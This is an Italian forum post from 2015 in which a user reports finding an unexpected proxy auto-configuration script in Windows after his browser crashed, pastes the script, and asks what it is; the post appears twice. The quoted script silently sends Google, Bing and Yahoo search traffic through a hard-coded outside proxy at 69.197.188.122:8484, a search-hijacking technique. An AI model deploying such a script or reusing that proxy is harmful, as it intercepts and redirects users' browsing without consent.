psychok9
31-10-2015, 21:39
Mentre ero su Facebook, mi sono ritrovato il browser chiuso (per un attimo ho visto una finestra nera)... e ho notato che ho ritrovato questo percorso nella configurazione Internet proxy di Windows
(utilizza script di configurazione automatica):
https://localhost.world/localhost.world
function FindProxyForURL(url, host) {
if (shExpMatch(host, "www.bing.com")) return "PROXY 69.197.188.122:8484";
if (shExpMatch(host, "*.search.yahoo.com")) return "PROXY 69.197.188.122:8484";
ga = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ga.test(url)) { return "PROXY 69.197.188.122:8484" }
gb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (gb.test(url)) { return "PROXY 69.197.188.122:8484" }
gc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (gc.test(url)) { return "PROXY 69.197.188.122:8484" }
gd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (gd.test(url)) { return "PROXY 69.197.188.122:8484" }
ge = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (ge.test(url)) { return "PROXY 69.197.188.122:8484" }
gx = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (gx.test(url)) { return "PROXY 69.197.188.122:8484" }
return "DIRECT";
}
Cosa può essere? Ho fatto scansioni complete, con Windows Defender, Avira, kaspersky removal tool, ... il sistema sembra pulito.
(utilizza script di configurazione automatica):
https://localhost.world/localhost.world
function FindProxyForURL(url, host) {
if (shExpMatch(host, "www.bing.com")) return "PROXY 69.197.188.122:8484";
if (shExpMatch(host, "*.search.yahoo.com")) return "PROXY 69.197.188.122:8484";
ga = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ga.test(url)) { return "PROXY 69.197.188.122:8484" }
gb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (gb.test(url)) { return "PROXY 69.197.188.122:8484" }
gc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (gc.test(url)) { return "PROXY 69.197.188.122:8484" }
gd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (gd.test(url)) { return "PROXY 69.197.188.122:8484" }
ge = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (ge.test(url)) { return "PROXY 69.197.188.122:8484" }
gx = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (gx.test(url)) { return "PROXY 69.197.188.122:8484" }
return "DIRECT";
}
Cosa può essere? Ho fatto scansioni complete, con Windows Defender, Avira, kaspersky removal tool, ... il sistema sembra pulito.